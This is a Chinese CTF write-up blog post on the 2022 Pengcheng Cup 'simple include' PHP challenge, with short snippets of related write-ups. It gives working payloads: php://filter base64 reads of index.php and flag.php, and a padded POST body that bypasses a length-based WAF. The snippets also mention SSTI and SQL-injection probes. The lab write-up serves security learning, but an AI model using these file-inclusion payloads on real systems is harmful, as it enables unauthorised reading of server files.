[鹏城杯 2022]简单包含

于 2024-06-11 23:13:30 发布
阅读量272 收藏 10
点赞数 4
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44833249/article/details/139610945
版权

关联知识点:PHP伪协议,文件包含,php

打开环境,代码审计,通过post传导flag变量,包含传入的flag变量,又告诉了flag的位置,所以直接payload:?flag=/var/www/html/flag.php,发送

又尝试filter过滤器尝试发送也不行被过滤了,访问index.php查看源代码

payload:?flag=php://filter/read=convert.base64-encode/resource=index.php

将返回的一串base64编码进行解密操作

有两个条件,post传入的内容小于800长度并且传入的path变量不能有flag

后面的条件不好不满足,所以只需要将字符长度达到800就行

Payload:a=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&flag=php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php

将返回的base64编码进行解码即可

flag{Funny_web}
关注
CTF网络安全题目个人导航【持续更新】
oZuoShen123的博客
10-11 1003
个人整理
2022鹏城web
m0_54849806的博客
07-28 1672
扫描后台发现存在.git,利用githack工具拿到.git文件夹,利用gitlog查看commitid,利用gitreset--hardbe50c81b903b0005d0740d221e74c51340251bc2进行恢复拿到源码。应该是需要删除掉网站根目录下的bocai.html、bocai.png,然后再来执行,不过暂时没有删除的权限,所以应该是需要提权了。那么我们可以直接覆盖一个php文件。可以将上传的文件写入,但是还要传个id,并且最终拼接成了路径是已存在的文件。...
NSS [鹏城 2022]简单包含
Jay17的博客
07-05 706
NSS [鹏城 2022]简单包含
[鹏城 2022]简单的php
11-04
鹏城是一个编程比赛,2022年的题目是关于简单的PHP编程。PHP是一种常用的服务器端脚本语言,用于开发动态网站和Web应用程序。 在这个比赛中,参赛者需要用PHP编写一个简单的程序。程序的要求可能包括输入一个数字...
181202 逆向-2018鹏城
whklhhhh的博客
12-02 1480
本次比赛的各个Re题目都对各种公开密码算法的运用考察比较多,还是挺有意思的~ Reverse badblock main函数打开发现是C++写的,充斥大量无用代码 于是转头执行,发现接收输入后回弹err... 搜索字符串发现有三处引用 分别是两个anti_debug和一个puts_wrong anti_debug分别通过ptrace和getpid()的方法,不必多说,调试的时候直接绕过即可 put...
[鹏城 2022]简单包含 伪协议脏数据 绕过waf
ZhangAweio的博客
05-02 458
看到题目的那一刻,判断它是对 “flag”进行了过滤,所以。只要数量够多就行,不一定是 / 其他的都是可以的。
[鹏城 2022]简单包含 wp
weixin_74358176的博客
09-19 211
[鹏城 2022]简单包含 wp
[CISCN 2019华东南]Web11和[鹏城 2022]简单包含
m0_73700261的博客
04-24 191
这里的突破口在&&如果满足前边的条件了那后边就不会执行就直接进入if。所以就是我们需要传参一个要大于800个字的东西接着就能输出flag。题目打开是一个这么个界面,里边提到了一个xff的头。试着传参一个带filter协议的payload。简单来说就是需要传参一个带协议的payload。解码发现是一串代码里边是想要输出flag的条件。接着就会include你想要的文件。先使用{{7*7}}来测试一波。发现回显一段base64的代码。打开来是个蛮简单的源代码。下边还有一个这么的提示。这里过滤了一个flag。
2022鹏城CTF---Crypto wp
3tefanie丶zhou的博客
07-07 2291
【我们对别人,对这个世界,所有的误会,可能都来自三个字,”我觉得“。】
2022鹏城
unexpectedthing的博客
08-30 2406
2022鹏城
2022年第二届鹏城部分题目Writeup
个人博客:https://www.mrzry.top
08-25 3997
题目:easy_rsa、babyrsa、简单取证、baby_re、easy_sql、babybit
鹏城2022部分web
qq_44640313的博客
04-25 330
脏东西添加绕过和关于无参数RCE的绕过,取反的学习
长城前的准备
NYG694的博客
03-06 717
​。
【无标题】
最新发布
2301_79880442的博客
04-11 1035
打开后是熟悉的杰哥,并且提示我们尝试输点东西,查看源代码,参数是wllm,传参。构造:?wllm=1没有报错,?wllm=1'发生报错,?wllm=1''没有报错,说明是单引号闭合。构造:?wllm=1' order by 2%23,报错非法操作,根据题目提示,过滤了空格,用/**/来代替空格构造:?当到?wllm=1'/**/order/**/by/**/4%23的时候错误,说明长度为3.知道长度后就可以查询数据库名。构造:?
buuctf刷题12(zip://包含& 取反+无参数rce & csrf & FFI扩展安全)
weixin_63231007的博客
02-19 1352
[极客大挑战 2020] Roamphp 1、2、4 rceme、5、6 flagshop、7 & 鹏程-简单的php
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值